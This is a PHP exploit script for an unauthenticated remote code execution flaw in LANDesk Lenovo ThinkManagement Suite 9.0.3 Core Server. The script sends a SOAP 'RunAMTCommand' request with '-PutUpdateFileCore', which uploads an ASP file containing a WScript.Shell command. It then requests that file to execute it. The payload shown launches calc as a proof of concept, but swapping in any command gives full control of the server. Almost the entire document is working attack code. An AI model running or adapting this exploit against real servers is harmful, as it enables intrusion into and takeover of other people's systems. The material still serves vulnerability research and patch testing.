<?php
/*
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server AMTConfig.Business.dll 
RunAMTCommand Remote Code Execution Vulnerability
*/
    error_reporting(E_ALL ^ E_NOTICE);     
    set_time_limit(0);
    
	$err[0] = "[!] This script is intended to be launched from the cli!";
    $err[1] = "[!] You need the curl extesion loaded!";

    if (php_sapi_name() <> "cli") {
        die($err[0]);
    }
    
	function syntax() {
       print("usage: php 9sg_landesk.php [ip_address]\r\n" );
       die();
    }
    
	$argv[1] ? print("[*] Attacking...\n") :
    syntax();
    
	if (!extension_loaded('curl')) {
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
        false;
        if ($win) {
            !dl("php_curl.dll") ? die($err[1]) :
             print("[*] curl loaded\n");
        } else {
            !dl("php_curl.so") ? die($err[1]) :
             print("[*] curl loaded\n");
        }
    }
        
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "Cookie: ".$ck ,
            "Content-Type: text/xml; charset=utf-8",
            "SOAPAction: \"http://tempuri.org/RunAMTCommand\""      

        )); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
         
        if ($_use_proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
        }
        $_d = curl_exec($ch);
        if (curl_errno($ch)) {
            //die("[!] ".curl_error($ch)."\n");
        } else {
            curl_close($ch);
        }
        return $_d;
    }
          $host = $argv[1];
          $port = 80;

$shell="<%\r\n".
       "Dim WshShell, oExec\r\n".
       "Set WshShell = CreateObject(\"WScript.Shell\")\r\n".
       "Set oExec = WshShell.Exec(\"calc\")\r\n".
       "%>\r\n";

$soap='<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RunAMTCommand xmlns="http://tempuri.org/">
      <Command>-PutUpdateFileCore</Command>
      <Data1>aaaa</Data1>
      <Data2>upl\suntzu.asp</Data2>
      <Data3>'.htmlentities($shell).'</Data3>
      <ReturnString>bbbb</ReturnString>
    </RunAMTCommand>
  </soap:Body>
</soap:Envelope>';

$url = "http://$host:$port/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx";
$out = _s($url, 1, "", $soap);
print($out."\n");

sleep(2);

$url = "http://$host:$port/upl/suntzu.asp";
$out = _s($url, 0, "", "");
print($out."\n");
print("[*] Now look for calc.exe sub-process...");
?>